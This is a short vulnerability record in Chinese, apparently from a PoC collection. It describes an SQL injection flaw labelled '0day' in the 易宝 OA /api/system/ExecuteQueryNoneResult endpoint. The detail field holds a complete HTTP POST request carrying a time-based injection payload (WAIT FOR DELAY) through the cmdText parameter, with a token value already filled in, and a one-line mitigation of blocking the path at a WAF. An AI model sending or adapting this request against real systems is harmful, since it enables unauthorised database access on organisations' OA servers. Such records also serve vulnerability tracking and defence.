vendor = "易宝"
name = "易宝 OA /api/system/ExecuteQueryNoneResult 接口SQL注入漏洞"
type = "SQL注入"
version = "未知"
path = "/api/system/ExecuteQueryNoneResult"
detail = "POST /api/system/ExecuteQueryNoneResult HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 Content-Type: application/x-www-form-urlencoded Content-Length: 42 token=zxh&cmdText=;WAITFOR+DELAY+'0:0:10'"
fix = "WAF封禁路路径，等待发布补丁"
date = "0828"
label = "0day"
